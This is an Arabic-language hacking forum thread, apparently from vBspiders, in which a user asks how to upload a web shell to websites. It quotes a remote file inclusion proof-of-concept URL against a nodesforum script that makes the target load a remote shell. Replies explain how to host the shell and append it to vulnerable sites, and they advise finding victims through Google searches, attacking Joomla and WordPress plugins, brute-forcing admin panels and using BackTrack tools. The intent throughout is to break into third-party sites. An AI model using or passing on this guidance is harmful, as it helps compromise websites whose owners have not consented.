|
طلب طريقة لرفع شل السلأم عليكم .. ممكن موقع ارفع عليه شل مثل استغلال هذه الثغرة .. يعني لازمك تربط رابط الشل بالملف المصاب PoC: http://[target_host]/nodesforum/3rd_party_limits.php?_nodesforum_code_path=[RemoteShellCode] |
رد: طلب طريقة لرفع شل اقتباس:
رفع الشيل له عدة طرق وسأحاول ان أجعل الامور بسيطة لكى تتضح الفكرة النوع الذى ذكرته وهو نوع من انواع الثغرات تسمى الفايل انكلود وهى عبارة عن مواقع بها أخطاء او ملفات مصابة بخطأ برمجى يمكنك من خلال هذا الخطأ رفع الشيل ولكى تقوم بها أولا عليك ان تقوم برفع الشيل الخاص بك برابط مباشر ثم وضعه بعد رابط الموقع المصاب كل ماعليك ان تبحث بعمو جوجل عن مواقع مصابة بهذه الثغرة وسوف تتمكن من رفع الشيل |
نعم أخي و هذا الذي أطلبه .. أطلب موقع يعطيني رابط مباشر للشل لكي استعمله في هذه الثغرات أوكي ياغالي شكرا ع التوجيه الجيد .. ممكن تنصحني بثغرة جيدة و منتشرة بكثرة غير الـ Sql شكرا جزيلأ لك ع التوجيه حاليا اعرف كيفية استغلال عدد قليل من الثغرات و طبعا LFI و XSS لأ أفقه فيهم شي لكن أحاول ان شاء الله |
وعليكم السلام ورحمة الله وبركاته ثغرات الريموت الان غير موجوده الا بنسبة 1% الثغره تعمل على اصدارات البي اتش بي 4 واقل تقدر ترفع الشل على مساحه مجانيه يوجدا ثغرات local file نفس انتشار ثغرات sql يوجد ثغرات اخرى xss وثغرات xss html وثغرات PHP Code Injection وثغرات Remote Command Execution وثغرات upload استهدف عن طريق اضافات جملا واضافات الورد بريس والبروت فورس على اللوحات خمن على قواعد السيرفر استعمل ادوات الباك تراك كله مفيد فى الاستهداف |
رد: طلب طريقة لرفع شل ياغالي هذه ألثفرة منقرضه لا وجود لها يعني أحتمال تجد موقع واحد من أصل مليونين موقع... وحتى لا تشتغل على Php5 تم ترقيع سحب ملف من خارج سيرفر لداخل السيرفر أنصحك بتعلم ثغراة Bypass Upload , Xss , Sql |
رد: طلب طريقة لرفع شل thx |
| الساعة الآن 02:17 AM |
[ vBspiders.Com Network ]